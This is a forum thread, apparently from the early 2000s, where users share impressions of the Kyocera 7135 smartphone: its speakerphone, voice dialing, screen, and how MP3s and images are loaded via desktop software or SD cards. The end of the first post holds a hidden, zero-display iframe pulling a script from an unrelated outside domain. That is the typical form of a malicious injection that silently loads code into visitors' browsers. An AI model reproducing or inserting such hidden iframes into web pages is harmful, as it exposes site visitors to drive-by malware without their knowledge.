My first post at this great site. Like everyone else here, I am obsessed with the 7135 and can't wait to get my hands on one. My simple question for the Beta testers is...set aside the detail of every little feature you're scrutinizing as you test, what is your overall impression of this phone? Is it as great as we all want to believe it is? Would you pay the SRP of $500 for it?
Thanks in advance for the feedback.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
Welcome Pizzaface (although I've only posted for the past week!)

Thanks in advance for the feedback.
For the record, I'm NOT under NDA (in fact when I received the review unit I specifically asked if I was under embargo and was told "no!"
The simple answer: yes, it is QUITE an impressive piece of hardware.
OTHER than the Caller ID bug I found a few weeks ago (and EIS Browser frequently crashing) ... I liked all the features, and they seemed to work fine!
Perhaps ONE of the most impressive features was the speakerphone. yes, it IS FULL DUPLEX. I tested it and could tell VERY LITTLE difference between speaker and handset.
The demo came with pre-loaded MP3s ... I was NOT able to "load" any, since the software to load MP3s is desktop which wasn't included. Sound quality was "ok" (translation: bass was non-existent).
I also really liked the voice dial function (although it's limited to 30 Phone Book entries). With the push of a button on the mic of the earbud headset, you can make a call without opening the flip! PLUS, you can answer ANY call by voice as well!
One comment on the screen ... yes, it's sharp and bright -- but at the same time I had the 7135, I ALSO had a Treo 300. Despite using an STN screen (vs. the 7135's TFT screen), I did not think the Treo's screen was bad at all. Still, the 7135 screen IS very nice.
On a side note -- one of my friends is also DESPERATE for the 7135, primarily because of the flip design. But also, she INSISTS on having Graffiti.
Whoah whoah whoah... backup here pal... you mean to say I can't just pop in my SD card into my computer, load in some prc's and mp3's and have it work? Isn't it formatted in FAT like the Visor MemPlug's which I use now?

I could be wrong but the way I read that post was that the MP3 where stored on the internal ram. If that was the case then you would need the sync software to upload MP3's

I don't honestly know if you can just copy MP3s to an SD card and have the 7135's Player recognize them -- I don't have an external SD card reader. Given that fact, you may very well be able to do that. But according to the docs provided by Kyocera, MP3 and JPG upload to the 7135 is done using the desktop client software.
I DO know, however, that you CANNOT load MP3s, AVIs, or JPGs to the 7135 using Hotsync.
I also know, according to Kyocera, that the ONLY way to set an MP3 as a phone ring tone is using the desktop client software.

Shameless
As I just said to M3, you CANNOT upload MP3s, AVIs, or JPGs to the 7135 using Hotsync.
JPGs and AVIs are uploaded to the 7135 using the desktop client of MGI Photosuite Mobile. I DO NOT know what desktop software is used to upload MP3s.
Call me mew. I have Photosuite Mobile, although I haven't experimented with how it converts files(if at all) and VFS at all. If it just uses that built in, then what I test...ah....hold on, I'll convert some thingies...
All images, mp3s, avi's, etc, can be loaded to a MMC/SD card seperatly, and then viewed/listened to on the 7135. In addition, there is two applications for your PC that takes care of the transfers through the cradle, to the 7135, and on to the SD/MMC card. MGI PhotoSuite mobile handles pictures amnd movies, while the Kyocera MP3 desktop handles the tunes

does the 7135's version of photosuite have sound with its videos?
I don't know the answer personally, but unless they planned on us watching old Buster Keaton & Charlie Chaplin clips on it, it would seem like an obvious necessity.
Now this is just a general Palm question. I use a Visor MemPlug. Everytime I remove any expansion from my Visor, or the card in the memplug, my device shuts off the screen for about 5 seconds before coming back and when I replace the card the launcher(Launcher III) rescans the whole thingy(32mb of games...) which takes minutes to do. Is SD on Palms much faster than a Visor SM Memplug and is the long refereshing just on Pre OS4.0 devices?
